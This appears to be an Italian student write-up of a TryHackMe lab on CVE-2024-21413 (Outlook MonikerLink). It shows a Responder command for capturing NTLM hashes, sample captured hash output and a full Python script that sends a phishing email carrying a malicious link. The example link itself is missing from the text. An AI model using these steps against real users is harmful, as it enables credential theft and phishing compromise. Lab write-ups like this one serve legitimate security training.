
Il progetto è stato creato per dimostrare l'uso di vari strumenti per catturare hash NTLM dagli utenti su una rete e per eseguire attacchi di phishing tramite email. Questo mostra come le vulnerabilità dell'autenticazione di rete e i metodi di phishing possano essere sfruttati per compromettere i sistemi.
Obiettivo del Progetto: Il progetto è stato creato per dimostrare l'uso di vari strumenti per catturare hash NTLM dagli utenti su una rete e per eseguire attacchi di phishing tramite email. Questo mostra come le vulnerabilità di autenticazione di rete e i metodi di phishing possano essere sfruttati per compromettere i sistemi.
Descrizione del Processo
Ho eseguito il seguente comando per avviare Responder:
root@ip-10-10-192-145:~# sudo responder -I ens5
Ho configurato Responder per ascoltare sull'interfaccia ens5. Ha immediatamente iniziato a intercettare richieste di autenticazione, permettendomi di visualizzare hash NTLM dagli utenti sulla rete, come THM-MONIKERLINK\tryhackme e WORKGROUP\Administrator. Ecco come appariva l'output durante la cattura degli hash:
[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB
Questi hash possono poi essere utilizzati per attacchi come brute force o attacchi con hash.
Il link di phishing nell'email era così:
Ecco lo script Python completo utilizzato per inviare l'email di phishing:import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr
sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")
html_content = """\
"""message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email
msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)
server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()
try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)
try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()
Questo script invia un'email con un link malevolo, che potrebbe potenzialmente sfruttare la vulnerabilità CVE-2024-21413.
Risultati Come risultato, sono riuscito a dimostrare due aspetti chiave:
Catturare hash NTLM usando lo strumento Responder, che è un passo cruciale per attaccare l'autenticazione di rete.
Phishing e sfruttamento di vulnerabilità tramite email usando lo script Python. Inviare email di phishing con link malevoli può ingannare gli utenti e portare alla compromissione del sistema.
Questo progetto ha mostrato come le vulnerabilità di rete e gli attacchi di phishing possano essere sfruttati per ottenere accesso ai sistemi. Ha anche evidenziato l'importanza di difendersi da tali attacchi tramite metodi di autenticazione forti e filtraggio del traffico email.